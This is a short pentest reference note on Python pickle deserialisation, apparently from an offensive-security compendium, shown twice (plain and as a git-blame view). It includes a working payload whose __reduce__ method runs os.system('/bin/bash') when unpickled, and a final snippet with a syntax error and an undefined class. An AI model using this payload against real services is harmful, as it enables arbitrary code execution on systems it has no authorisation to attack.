killchain-compendium/Exploits/Python/Pickle.md

# Pickle

Serializes a Python object into a byte stream an back.
When sending pickled data through a network do base64 encoding first to prevent
special characters to do something unexpected.

```python
import pickle
import base64


text = "Hello, World!"
pickled = pickle.dumps(text)
send_data = base64.b64encode(pickled)
receive_data = base64.b64decode(send_data)
unpickled = pickle.loads(pickled)
```

## Payload

The following payload can be injected into a pickled object.

```python
import pickle
import os
import base64
class evil_object(object):
    def __reduce__(self):
        return(os.system, ('/bin/bash',))
x = evil_object()
y = pickle.dumps(x)
base64.b64encode(y)
```

* Dump serialized object via

```python
pickle.dump(SerializedPickle(), open('pickled.out', 'wb')
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# Pickle`

details on pickle and php serialize 2024-05-07 21:38:46 +02:00			`Serializes a Python object into a byte stream an back.`
			`When sending pickled data through a network do base64 encoding first to prevent`
			`special characters to do something unexpected.`

			```python
			`import pickle`
			`import base64`


			`text = "Hello, World!"`
			`pickled = pickle.dumps(text)`
			`send_data = base64.b64encode(pickled)`
			`receive_data = base64.b64decode(send_data)`
			`unpickled = pickle.loads(pickled)`
			```

restructured Exploits 2022-11-13 22:38:01 +01:00			`## Payload`
details on pickle and php serialize 2024-05-07 21:38:46 +02:00
			`The following payload can be injected into a pickled object.`

restructured Exploits 2022-11-13 22:38:01 +01:00			```python
			`import pickle`
			`import os`
			`import base64`
			`class evil_object(object):`
			`def __reduce__(self):`
			`return(os.system, ('/bin/bash',))`
			`x = evil_object()`
			`y = pickle.dumps(x)`
			`base64.b64encode(y)`
			```

			`* Dump serialized object via`
details on pickle and php serialize 2024-05-07 21:38:46 +02:00
restructured Exploits 2022-11-13 22:38:01 +01:00			```python
			`pickle.dump(SerializedPickle(), open('pickled.out', 'wb')`
			```